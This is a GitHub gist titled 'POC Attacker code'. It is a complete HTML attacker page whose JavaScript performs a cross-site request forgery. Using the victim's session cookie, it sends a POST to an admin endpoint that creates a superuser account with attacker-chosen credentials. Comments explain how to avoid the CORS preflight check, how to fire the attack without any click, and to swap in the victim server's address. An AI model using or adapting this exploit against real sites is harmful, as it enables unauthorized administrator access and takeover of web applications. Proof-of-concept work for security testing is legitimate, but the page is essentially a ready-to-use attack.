Skip to content

Instantly share code, notes, and snippets.

@Graph-X
Last active May 31, 2020
Embed
What would you like to do?
POC Attacker code
<html>
<head>
<title>This is the attacker page</title>
</head>
<body>
<p> This is the attacker's page</p>
<!-- This button is only here for the POC. You can just execute the script without further interaction from the end user by just calling the function. --!>
<button type="button" onclick="csrf()">I double dare you</button>
<br>
<textarea id='demo'></textarea>
<script>
function csrf() {
var data = "role=superuser&name=nowiamadmin&email=attacker%40gmail.com&password=password1&password2=passsword1";
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText; //we won't be getting to this part.
}
};
//Sending as a simple POST request prevents the OPTIONS pre-check from firing.
xhttp.open("POST", "https://192.168.41.143/poc/index.php?adminId=1", true); //change the url to your victim server IP
xhttp.withCredentials = true; //send the session cookie
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send(data);
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment